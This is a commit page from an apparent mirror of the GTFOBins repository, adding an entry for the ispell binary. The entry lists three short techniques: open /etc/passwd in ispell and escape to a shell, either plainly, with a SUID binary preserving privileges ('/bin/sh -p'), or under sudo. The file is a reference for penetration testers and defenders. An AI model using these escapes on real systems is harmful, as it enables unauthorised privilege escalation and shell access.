mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-04-26 16:54:49 +02:00
parent
1ab481cbd0
commit
50ab4f0ce0
15
_gtfobins/ispell.md
Normal file
15
_gtfobins/ispell.md
Normal file
@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
ispell /etc/passwd
|
||||||
|
!/bin/sh
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./ispell /etc/passwd
|
||||||
|
!/bin/sh -p
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo ispell /etc/passwd
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Loading…
x
Reference in New Issue
Block a user